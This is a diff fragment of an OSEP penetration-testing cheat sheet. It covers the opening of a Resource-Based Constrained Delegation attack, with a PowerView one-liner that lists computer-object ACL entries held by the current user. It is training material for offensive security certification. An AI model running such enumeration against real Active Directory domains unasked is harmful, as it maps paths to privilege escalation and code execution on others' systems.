peterkhe1999/CheatSheet/OSEP/README.md

 E.g., A RBCD attack that leads to code execution on appsrv01.

-Starts by compromising a domain account that has the **GenericWrite** access right on a computer account object.
+Starts by compromising a domain account that has the **GenericWrite** access right on a computer account object (user dave)

 ```pwsh
 Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}